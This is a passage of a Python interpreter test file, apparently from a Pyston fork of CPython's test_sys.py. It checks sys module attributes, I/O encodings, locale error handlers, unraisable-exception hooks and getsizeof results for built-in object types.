maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@unittest.skipIf(True, "Pyston changes refcount of None")
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated",
"dev_mode", "utf8_mode")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.requires_type_collecting
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize('2nP2nQ') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2nQ') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('5P2c4P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('13P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPPnPnPnP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn11PIPPP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize("2nP2n0PQ") + 8 + 5*calcsize("n2P") + calcsize("PPPP"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 5*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize("2nP2n0PQ") + 16 + 10*calcsize("n2P") + calcsize("PPPP"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 10*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
